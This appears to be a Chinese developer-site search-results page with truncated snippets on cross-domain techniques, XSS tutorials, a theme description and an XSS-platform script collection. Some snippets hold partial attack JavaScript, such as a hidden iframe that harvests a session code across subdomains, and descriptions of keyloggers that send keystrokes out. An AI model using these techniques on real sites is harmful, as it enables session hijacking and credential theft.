首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

Web前端学习笔记之前端跨域知识总结

iframe框架是不同域的,所以我们是无法通过在页面中书写js代码获取iframe中的东西的: function test()...对象 var name = win.name;//这里同样获取不到window对象的name属性 } <iframe id = "iframe" src...iframeiframesrc是baidu.com域下的,并挂上要传送的hash数据,如src=”http://www.baidu.com/proxy.html#data” proxy.html...比如,有个a.html页面,它里面的代码需要利用ajax获取一个不同域上的json数据,假设这个json数据地址是http://damonare.cn/data.php,那么a.html中的代码就可以这样...因为是当做一个js文件来引入的,所以http://damonare.cn/data.php返回的必须是一个能执行的js文件,所以这个页面的php代码可能是这样的(一定要和后端约定好哦): <?

1.1K30

web漏洞 | XSS(跨站攻击脚本)详解

) 关于XSS的代码审计主要就是接收参数的地方和一些关键词入手。...PHP中常见的接收参数的方式有_GET、_POST、 也可以搜索类似echo这样的输出语句,跟踪输出的变量是哪里来的,我们是否能控制,如果数据库中取的,是否能控制存到数据库中的数据,存到数据库之前有没有进行过滤等等...Tom 利用获取到的cookie就可以Alice的身份登录Bob的站点,如果脚本的功更强大的话,Tom 还可以对Alice的浏览器做控制并进一步利用漏洞控制 存储型XSS漏洞: Bob拥有一个Web站点...等标签的事件或者 iframe 等标签的 src 注入恶意的 js 代码。...<iframe src="http://127.0.0.1/vulnerabilities/xss_r/?

4.8K20

通过XSS跨子域拿到受HttpOnly保护的Cookie

注意到在此之后又发送了一个数据包,其中带了sscode(图是修复后的,sscode经过加密了) ? 那这个请求是哪儿发出来的呢?注意到请求头中的Referer。...搜索sscode定位script标签,可看到确实是通过src属性值发出来的请求。 ? 那么可以通过同域的Xss漏洞来获取登录页面的响应内容,再提取出其中的sscode。...document.domain = 'example.com'; //设置同域 var iframe = document.createElement("iframe"); iframe.src = "...http://www.example.com/user/login_success.php"; iframe.style="width:0%;height:0%;"; //设置不可见 隐蔽性高 document.body.appendChild...; //获取iframe页面的内容 var scr = content.getElementsByTagName('script'); //拿到所有script标签 var str = scr[

1.6K50

Polyhedron主题:一款简洁大方的双栏自适应Typecho主题

[详细说明链接待补充] B站视频嵌入 在B站视频页面分享处获取代码如: <iframe src="//player.bilibili.com/player.html?...然后在给iframe 这个标签添加 class=“iframe_video” 位置如下: <iframe class="iframe_video" src="//player.bilibili.com...侧边栏友链默认最多显示10个,可以在sidebar.php里更改 [详细说明链接待添加] 代码高亮 基于Prism开发的代码高亮功能。你只需要在代码前加入标签即可实现代码高亮。...标签如下: 当然,```后的php可以修改为CSS等其他语言代码。会在代码右端显示Copy功能字样与代码语言字样。...当然如果您觉得不需要这些链接,可以直接在footer.php删除相应代码

1.7K20

XSS平台模块拓展 | 内附42个js脚本源码

01.简单的键盘记录键盘 一个非常简单的键盘记录程序,可捕获击键并将其每秒发送到外部页面.JS和PHP代码在归档中提供的PHP。...10.端口扫描 API 一个小的portscanner代码,在加载远程资源时利用javascript引擎的行为。代码将被集成到一个更强大的框架中。...结果通过img.src发送回第三方服务器,确保他们能够到达那里。很好的使用HTML5功能!...第一个iFrame获取CSRF保护的页面,在第一个表单的“token”参数中窃取标记值,并创建第二个iFrame,并与相应的标记进行连接。...35.获取本地存储 一个微小的代码来检索HTML5本地存储并通过图像源URL发送出去。 36.MS Office版本的 有效负载旨在识别目标系统上运行的MS Office的版本。

12.4K80
领券